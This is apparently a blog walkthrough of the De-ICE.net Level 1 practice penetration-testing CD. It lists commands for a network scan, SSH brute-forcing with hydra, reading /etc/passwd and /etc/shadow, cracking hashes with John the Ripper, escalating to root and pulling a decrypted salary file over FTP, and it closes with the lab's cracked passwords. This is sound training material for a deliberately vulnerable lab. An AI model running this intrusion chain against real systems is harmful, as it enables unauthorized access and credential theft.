De-ICE.net v1.0 (1.100) {Level 1 - Disk 1}

This is my walk though of how I broke into the De-ICE.net network, level 1, disk 1.

The De-ICE.net network is on a "live PenTest CD", that creates a target(s) on which to practise penetration testing; it has an "end goal" to reach.

Links

Watch video on-line:

Download video: http://download.g0tmi1k.com/videos_archive/De-ICE_v1.0_(1.100).mp4

Tools

  • BackTrack 4 (Final)
  • de-ice.net-1.100-1.0.iso (MD5: a3341316ca9860b3a0acb06bdc58bbc1)
  • Dictionary(s)

Software

Name: De-ICE.net

Version: 1.0 (Level 1 - Disk 1 - IP Address: 1.100)

Home Page: http://www.de-ice.net/ or hxxp://heorot.net/livecds/

Download Link: hxxp://heorot.net/instruction/tutorials/iso/de-ice.net-1.100-1.1.iso (new: http://hackingdojo.com/dojo-media/)

Forums/Support: hxxp://forums.heorot.net/ or hxxp://forums.heorot.net/viewtopic.php?f=16&t=13

WiKi/Support: http://de-ice.net/hackerpedia/index.php/De-ICE.net_PenTest_Disks

Commands

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
nmap -n 192.168.1.1-255
nmap -n -sS -sV -O 192.168.1.100
firefox 192.168.1.100
[ ]kate -> make list of possible usernames. Save. Filename: usernames
// lastF, fLast
hydra 192.168.1.100 ssh2 -L /root/usernames -p password -e s
ssh [bbanter@192.168.1.100][4]
// "Yes" if quiz about trusting authenticity. Password: bbanter
cd /etc/
cat passwd
[ ]kate -> Update usernames. Save.
cat group
exit
cd /root/tools/dictionary/
cat common-1 common-2 common-3 common-4 wordlist.txt >> /root/passwords
hydra 192.168.1.100 ssh2 -V -l aadams -P /root/passwords
ssh [aadams@192.168.1.100][5]
// Password: nostradamus
cd /etc/
sudo cat shadow
// Password: nostradamus
[ ]kate -> New -> Paste -> Save. Filename: shadow
exit
john
./john --rules --wordlist=/root/passwords --users=root /root/shadow
// Password: tarot
ssh [aadams@192.168.1.100][5]
// Password: nostradamus
su
// Password: tarot
ls -a
cd ..
ls -a
cd ftp
/
ls -a
cd incoming/
ls -a
openssl enc -d -aes-128-cbc -in salary_dec2003.csv.enc -out salary.csv -k tarot
cd /etc/
vi vsftpd.conf
// edit (by pressing i) vsftpd.conf to have a '#' in front of 'listen=YES' (last line). Then save it (:w), and exit (:quit)
modprobe capability
exit
exit
ftp 192.168.1.100
// User: root. Password: tarot
ls -a
cd ..
ls -a
cd home
ls -a
cd ftp
ls -a
cd incoming
ls -a
get salary.csv
cd /pentest/passwords/jtr
ls
mv salary.csv ~
[ ]kate -> salary.csv
// GAME OVER
----------------------------------------------------------------------------------------------------
Users
root:tarot           = root:$1$TOi0HE5n$j3obHaAlUdMbHQnJ4Y5Dq0:13553:0:::::
aadams:nostradamus   = aadams:$1$6cP/ya8m$2CNF8mE.ONyQipxlwjp8P1:13550:0:99999:7:::
bbanter:bbanter      = bbanter:$1$hl312g8m$Cf9v9OoRN062STzYiWDTh1:13550:0:99999:7:::
ccoffee:hierophant   = ccoffee:$1$nsHnABm3$OHraCR9ro.idCMtEiFPPA.:13550:0:99999:7:::
----------------------------------------------------------------------------------------------------

Notes

Song: Aly & Fila - Khepera

Video length: 04:11

Capture length: 08:52

Blog Post: https://blog.g0tmi1k.com/2010/02/de-icenet-v10-1100-level-1-disk-1/